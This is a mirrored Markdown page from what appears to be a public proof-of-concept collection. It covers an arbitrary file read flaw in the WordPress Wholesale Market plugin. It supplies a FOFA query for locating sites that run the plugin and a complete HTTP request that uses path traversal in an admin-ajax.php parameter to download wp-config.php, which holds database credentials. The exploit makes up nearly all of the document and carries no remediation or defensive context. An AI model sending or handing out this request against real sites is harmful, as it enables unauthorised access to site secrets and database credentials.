mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 22:14:15 +00:00
17 lines
415 B
Markdown
17 lines
415 B
Markdown
![]() |
## WordPress_Wholesale_Market插件存在任意文件读取漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
body="wp-content/plugins/wholesale-market"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1
|
||
|
Host:
|
||
|
User-Agent: Mozilla/5.0
|
||
|
Connection: close
|
||
|
Accept-Encoding: gzip
|
||
|
```
|
||
|
|